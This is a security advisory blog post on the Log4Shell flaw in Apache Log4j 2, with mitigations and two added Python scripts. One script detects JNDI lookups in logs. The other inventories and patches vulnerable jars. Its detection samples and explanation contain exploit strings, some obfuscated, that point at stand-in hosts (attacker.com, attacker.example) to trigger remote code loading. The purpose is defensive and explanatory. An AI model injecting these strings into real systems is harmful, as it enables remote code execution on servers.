
Apache Log4J2 Vulnerability


December 13, 2021

By John Rote

Apache Log4J2 Vulnerability:

A new critical remote code execution vulnerability in Apache Log4j 2 (CVE-2021-44228, widely referred to as Log4Shell), a Java-based logging library, was disclosed on 10 December 2021. The vulnerability is trivial to exploit and can lead to full control of the targeted server. Public proof-of-concept code appeared within a day of disclosure and widespread scanning for exposed services has been reported, so exploitation attempts against any Internet-facing Java application should be assumed.

Details:

The vulnerability is trivially easy to exploit. Log4j 2 performs string substitution ("lookups") on the messages it logs, and one of the lookup prefixes, jndi, asks the Java Naming and Directory Interface to fetch an object from a URL. An attacker therefore only needs to get a string of the form ${jndi:ldap://attacker.com/file} into any value the target logs (a User-Agent header, a username, a search query, a chat message); Log4j resolves the lookup, the JVM connects to the attacker's LDAP server, and the reference it returns causes attacker-supplied Java code to be loaded and run inside the application's process. It is difficult to assess the extent of the possible impact, as Log4j 2 is used across a variety of products and services, from Apache projects such as Struts, Solr, and Flink, to Elasticsearch, Logstash, and Kafka, to network products from NetApp and Cisco, and even Minecraft servers.
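The lookup string rarely arrives in the plain form shown above once scanners and attackers start evading string matches: it is URL-encoded in query strings, or the word jndi is assembled from nested lookups such as ${lower:j} and ${::-j} that Log4j resolves to a single letter before the outer lookup runs. The Python script below is an added example, not code from the original post or from any of the vendors linked here; it undoes those two transformations and then searches for the resolved ${jndi:<scheme>:...} string. The access-log lines and the attacker.example hostnames are constructed for the demonstration.

```python
"""Added example (not code from the original advisory): detect JNDI lookup
strings such as ${jndi:ldap://attacker.com/file} in log or request data,
including the URL-encoded and nested-lookup forms used to hide them."""
from __future__ import annotations

import re
import urllib.parse

# Constructed sample access-log lines (not real traffic). Entries 2-5 carry a
# lookup in the User-Agent or query string; entries 1 and 6 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%3A1099%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/c}"',
    '10.0.0.7 - - [10/Dec/2021:14:02:17 +0000] "GET /docs/${version} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Lookups that resolve to a literal and are used to spell "jndi" piecewise:
#   ${lower:j} / ${upper:J} -> j          ${::-j} / ${env:NOPE:-j} -> j
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The resolved form: ${jndi:<scheme>:...}. Log4j lower-cases the prefix before
# looking it up, so ${JNDI:...} works too; match case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:[^}]*\}", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode and resolve literal-producing lookups until nothing changes.
    Bounded so a hostile input cannot keep the loop running."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        decoded = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), decoded)
        decoded = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), decoded)
        if decoded == text:
            return text
        text = decoded
    return text


def find_jndi_lookups(text: str) -> list[tuple[str, str]]:
    """Return (scheme, resolved lookup) for every JNDI lookup in one line."""
    normalized = normalize(text)
    return [(m.group(1).lower(), m.group(0)) for m in _JNDI.finditer(normalized)]


def scan_log(lines) -> list[tuple[int, str, str]]:
    """Return (1-based line number, scheme, resolved lookup) for every hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for scheme, lookup in find_jndi_lookups(line):
            hits.append((number, scheme, lookup))
    return hits


if __name__ == "__main__":
    for number, scheme, lookup in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: scheme={scheme} lookup={lookup}")
```

The normalization step is what makes the difference in practice: a literal "${jndi:" match catches only the first of the four malicious lines above. Run the same function over request URIs, headers, and any other field your application logs, not just the User-Agent, and treat the scheme (ldap, ldaps, rmi, dns) as a pivot for the outbound-connection hunting described in the detection guidance linked below.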

Apache Log4j 2 versions 2.0-beta9 through 2.14.1 do not protect the JNDI features used in configuration, log messages, and parameters against attacker-controlled LDAP and other JNDI endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from an LDAP server when message lookup substitution is enabled. From Log4j 2.15.0 this behavior is disabled by default. In releases 2.10.0 through 2.14.1 it can be mitigated by setting the system property log4j2.formatMsgNoLookups to true (for example, adding -Dlog4j2.formatMsgNoLookups=true to the JVM options, or setting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true); for any affected 2.x release, including those older than 2.10.0 where the property does not exist, the JndiLookup class can be removed from the classpath instead (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class, followed by a restart of the JVM). Java 8u121 and later (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) default com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false, and Java 8u191 and later do the same for com.sun.jndi.ldap.object.trustURLCodebase, which blocks the simplest attack path of loading a class from a remote codebase. Do not treat the JVM version as the fix: the LDAP response can still carry a serialized Java object, or reference a factory class that is already on the application's classpath, and those paths execute attacker-controlled data without any remote class loading. Upgrade or apply one of the Log4j mitigations regardless of Java version.

Additional Information:

Microsoft released a blog post, "Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation":

hxxps://www.microsoft[.]com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

Notable information from the report:

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to exploitation of this vulnerability and will update it as new indicators are discovered:

hxxps://github[.]com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml

Recommendations:

Due to the severity and ease of exploitation of this vulnerability and the massive exploitation campaign expected against it, it is highly recommended that all instances of Log4j 2 be updated to the latest fixed release (2.15.0 at the time of writing; check the Apache security page in the links below for newer releases) as soon as possible. If upgrading is not possible, releases 2.10.0 through 2.14.1 can be mitigated by setting the system property log4j2.formatMsgNoLookups to true, and any affected release can be mitigated by removing the JndiLookup class from the classpath. Inventory first: Log4j is usually bundled inside application jars, wars, and vendor appliances rather than installed as a separate package, so search filesystems for log4j-core jars and for the JndiLookup class rather than relying on package managers alone, and check vendor advisories for the products listed above.
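The inventory and class-removal steps from the Details and Recommendations sections, written out as a Python script. This is an added example, not code from the original post or from the Log4j project: it walks a directory tree for jar, war and ear files, reads the log4j-core version from the Maven pom.properties that the official jars carry, classifies each file against the version boundaries given above, and rewrites vulnerable jars without JndiLookup.class exactly as the zip -q -d command does (keeping a .bak copy). The sample jars built by demo() are constructed stand-ins with placeholder bytes, not real log4j-core archives; jars nested inside wars are not opened, so fat archives still need a manual look.

```python
"""Added example (not from the original advisory or the Log4j project):
inventory log4j-core jars, classify them by version, and strip
JndiLookup.class the way 'zip -q -d' does. Sample jars are constructed."""
import os
import re
import shutil
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 15, 0)       # lookups disabled by default from here (per the advisory)
PROPERTY_VERSION = (2, 10, 0)    # log4j2.formatMsgNoLookups exists from here


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def inspect_jar(path):
    """Report the bundled log4j-core version and whether JndiLookup.class is present."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = parse_version(line.split("=", 1)[1].strip())
        has_lookup = JNDI_LOOKUP_CLASS in names
    if not has_lookup:
        status = "jndilookup-absent"        # already stripped, or not log4j-core 2.x
    elif version is None:
        status = "unknown-version"          # e.g. shaded jar: check manually
    elif version >= FIXED_VERSION:
        status = "fixed"
    elif version >= PROPERTY_VERSION:
        status = "vulnerable"               # property or class removal both work
    else:
        status = "vulnerable-no-property"   # only class removal works
    return {"version": version, "has_jndi_lookup": has_lookup, "status": status}


def find_jars(root):
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith((".jar", ".war", ".ear")):
                yield os.path.join(dirpath, name)


def remove_jndi_lookup(path):
    """Rewrite the archive without JndiLookup.class, keeping a .bak copy.
    Returns True if the class was removed. The JVM must be restarted afterwards."""
    tmp = path + ".tmp"
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP_CLASS not in src.namelist():
            return False
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_LOOKUP_CLASS:
                    dst.writestr(info, src.read(info.filename))  # keeps per-entry compression
    shutil.copy2(path, path + ".bak")
    os.replace(tmp, path)
    return True


def build_sample_jar(path, version, include_class=True):
    """Constructed stand-in for a log4j-core jar: placeholder bytes, not real classes."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr(POM_PROPERTIES,
                     f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_class:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")


def demo():
    """Scan, mitigate, rescan a constructed tree. Returns (statuses_before, statuses_after)."""
    with tempfile.TemporaryDirectory() as root:
        for sub, ver in (("lib", "2.14.1"), ("lib", "2.15.0"), ("legacy", "2.0-beta9")):
            build_sample_jar(os.path.join(root, sub, f"log4j-core-{ver}.jar"), ver)
        before = {os.path.basename(p): inspect_jar(p)["status"] for p in find_jars(root)}
        for p in list(find_jars(root)):
            if inspect_jar(p)["status"].startswith("vulnerable"):
                remove_jndi_lookup(p)
        after = {os.path.basename(p): inspect_jar(p)["status"] for p in find_jars(root)}
    return before, after


if __name__ == "__main__":
    before, after = demo()
    for name in sorted(before):
        print(f"{name}: {before[name]} -> {after[name]}")
```

Point find_jars at application directories, container image layers and vendor appliance filesystems, not just the system package paths; anything reported as unknown-version or jndilookup-absent inside a large shaded jar still deserves a manual check, because a renamed or nested copy of log4j-core will not carry the Maven pom.properties this script keys on.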

Useful Links:

https://logging.apache.org/log4j/2.x/security.html
https://issues.apache.org/jira/browse/LOG4J2-3201
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/